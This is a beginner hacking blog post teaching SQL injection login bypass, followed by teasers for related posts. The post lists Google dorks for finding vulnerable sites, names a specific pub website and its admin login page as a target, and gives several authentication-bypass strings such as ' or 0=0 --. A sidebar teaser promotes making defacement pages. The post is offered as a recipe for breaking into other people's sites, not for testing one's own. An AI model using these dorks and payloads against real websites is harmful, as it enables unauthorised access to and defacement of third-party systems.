Skip to main content

Simple Sql Injection Tutorial How To Hack Web Site with Sql Strings/Sql Injection [very easy]

Image
By

                           What Is Sql Injection?



SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.


Requirements :

  • First we need to find Sites for Hacking if we have to hack sites we must need to know how to find sites

Basically we use Dorks for Find Sites

some google dorks:
  1. "inurl:admin.asp"
  2. inurl:adminlogin.asp
  3. inurl:login/admin.asp

  4. inurl:read.php?=

  5. inurl:”ViewerFrame?Mode=”

  6. inurl:index.php?id=

  7. inurl:trainers.php?id=

  8. inurl:buy.php?category=
  9. inurl:article.php?ID=

now open google.com and copy any one dork form here and paste that on google and click search, you will get many SQL vunerablee sites

so we Found Sites Now we need to Find Admin Login Page of a Site.

now open sites one by one. and you will got admin login page.

Now we have done 2 step 1 is find vuln sites and 2nd is Find Admin login

Now Come to Main tutorial about Sql strings/injection

what is sql strings?

when we put sql string in admin login then login penal cant handle the queries and redrict you into admin area.

For Example i found a Site: http://www.roseandcrownrangeworthy.co.uk

and i found admin login panel: http://www.roseandcrownrangeworthy.co.uk/admin-home.asp

1st i tried username :admin and password: admin but i did not enter

but after i enter username: admin and password :   ′or’1′=’1
if the password not works try others passwords:

  • 'or'x'='x
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #


Thats it Guys if you getting Problem plz Comment or contact with me
Labels:

Comments

Post a Comment

Popular posts from this blog

11 Quick Tips: Securing Your WordPress Site

By
WordPress is the most used open-source platform nowadays for any type of websites: whether it is blog, CMS or any other custom solution. WordPress is naturally based on PHP (among other languages), so, as a PHP developer I always make sure to cover/apply some tips for WordPress to make secure and speedup the site which I develop. In this WordPress tutorial you will find tips and tricks for securing WordPress and otimizing your WordPress blog. This section will going to cover the tips related to securing your WordPress site. Tips includes protecting files, login restriction, WordPress admin restriction, database protection, etc. Security Tip 1:  Stay Updated The most important tip for securing the self hosted WordPress websites is also the most obvious; WordPress provides updates with security fixes all of the time. When you get the notification in admin panel, don’t ignore it! It’s the single most effective way to secure your site from attacks, and yet so many people leave their site (
Post a Comment
Read more

Make Deface Pages For Hacking Sites With Two MethoD

By
1st Method!!! In this Method i will tell you how to make Deface page With Advance Deface page Creator Tool
Post a Comment
Read more

Types Of Hack Or Attack

By
hello Reader , today i'm going to sharing you some types of hack attacks are done by hackers : - Cross Site Scripting (XSS)     XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.   - Injection Flaws     Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.any  idiot can do this :p      - Malicious File Execution     Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file exec
1 comment
Read more